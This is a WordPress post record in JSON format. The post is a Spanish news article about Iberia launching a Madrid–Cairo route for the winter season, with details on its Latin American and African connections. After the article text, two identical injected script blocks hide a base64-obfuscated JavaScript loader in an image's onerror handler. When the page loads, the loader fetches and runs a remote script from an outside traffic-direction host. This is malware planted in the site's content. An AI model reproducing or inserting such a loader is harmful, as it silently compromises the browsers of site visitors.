{"id":2998,"date":"2023-08-16T10:42:20","date_gmt":"2023-08-16T13:42:20","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2998"},"modified":"2025-08-14T00:10:18","modified_gmt":"2025-08-14T03:10:18","slug":"iberia-conectara-america-latina-con-egipto-desde-la-proxima-temporada-de-invierno","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2998","title":{"rendered":"Iberia conectar\u00e1 Am\u00e9rica Latina con Egipto desde la pr\u00f3xima temporada de invierno"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#e10321\"><em>La aerol\u00ednea operar\u00e1 la ruta con los nuevos A321 Neo, los aviones m\u00e1s modernos y eficientes de la flota de corto y medio radio de Airbus<\/em><\/h4>\n\n\n\n<p>Grupo Iberia sigue ampliando su red de conexiones internacionales, y gracias a la nueva ruta que se lanza entre Madrid y El Cairo para la pr\u00f3xima temporada de invierno, los clientes de Am\u00e9rica Latina podr\u00e1n conectar sus vuelos con la capital de Egipto desde los 18 destinos en 16 pa\u00edses que la aerol\u00ednea opera en esa regi\u00f3n.<\/p>\n\n\n\n<p>En concreto, esta nueva ruta, que operar\u00e1 Iberia Express, se inaugurar\u00e1 el pr\u00f3ximo 30 de octubre, un d\u00eda despu\u00e9s del inicio de la temporada de invierno, y contar\u00e1 con tres vuelos de ida y vuelta a la semana, todos los lunes, jueves y s\u00e1bados.<\/p>\n\n\n\n<p>Los horarios de salida de estos vuelos directos son, desde el Aeropuerto Adolfo Su\u00e1rez Madrid-Barajas, a las 16:35 horas, con una duraci\u00f3n de 4 horas y 50 minutos, mientras que la vuelta desde el Aeropuerto Internacional de El Cairo ser\u00e1 a las 22:25 horas, con una duraci\u00f3n aproximada de cinco horas y cuarto.<\/p>\n\n\n\n<p>La aerol\u00ednea operar\u00e1 la ruta con las nuevas aeronaves A321 NEO, los aviones m\u00e1s modernos y eficientes de la flota de corto y medio radio de Airbus.&nbsp;Este modelo cuenta con motores que consumen un 18% menos de combustible, en comparaci\u00f3n con el modelo A321 Ceo.&nbsp;Adem\u00e1s, permita una mayor capacidad de pasajeros y contribuya a reducir las emisiones.&nbsp;Los nuevos aviones tienen un 6% m\u00e1s de capacidad que el modelo anterior, y reducen en un 50% los niveles de ruido, mejorando el confort del pasajero y, en definitiva, realizando el viaje de una forma m\u00e1s sostenible<\/p>\n\n\n\n<p>Conexiones entre Am\u00e9rica Latina y \u00c1frica<br>Esta nueva ruta ampl\u00eda tambi\u00e9n la variedad de opciones con las que cuentan los clientes de Iberia en Am\u00e9rica Latina para conectar sus vuelos, con escala en Madrid, hacia otros destinos.<\/p>\n\n\n\n<p>Cabe mencionar que, en \u00c1frica, adem\u00e1s de esta nueva ruta con El Cairo, Grupo Iberia cuenta con vuelos a Marruecos: en la temporada de invierno Marrakech tendr\u00e1 un incremento de cuatro frecuencias hasta un total de 14 a la semana, y Casablanca tendr\u00e1 hasta las 11 semanales.&nbsp;De igual forma, T\u00e1nger contar\u00e1 con vuelo diario.<\/p>\n\n\n\n<p>Iberia tambi\u00e9n opera 10 frecuencias semanales con Dakar, la capital de Senegal, al tiempo que cuenta con dos hacia Argel, capital de Argelia.<\/p>\n\n\n\n<p>En la temporada de invierno austral -desde finales de octubre y hasta finales de marzo-, Iberia superar\u00e1 los 300 vuelos semanales entre Am\u00e9rica Latina y Espa\u00f1a, lo que supone un 14% m\u00e1s de las cifras que ten\u00eda antes de la pandemia.<\/p>\n\n\n\n<p><img decoding=\"async\" src=\"https:\/\/es.travel2latam.com\/visitas\/84141\" alt=\"\">Fuente: Iberia Airlines<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La aerol\u00ednea operar\u00e1 la ruta con los nuevos A321 Neo, los aviones m\u00e1s modernos y eficientes de la flota de corto y medio radio de Airbus Grupo Iberia sigue ampliando su red de conexiones internacionales, y gracias a la nueva ruta que se lanza entre Madrid y El Cairo para la pr\u00f3xima temporada de invierno, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2999,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[5],"tags":[],"class_list":{"0":"post-2998","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-buses-y-aeropuertos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2998"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2998"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2998\/revisions"}],"predecessor-version":[{"id":6990,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2998\/revisions\/6990"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2999"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2998"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2998"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2998"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}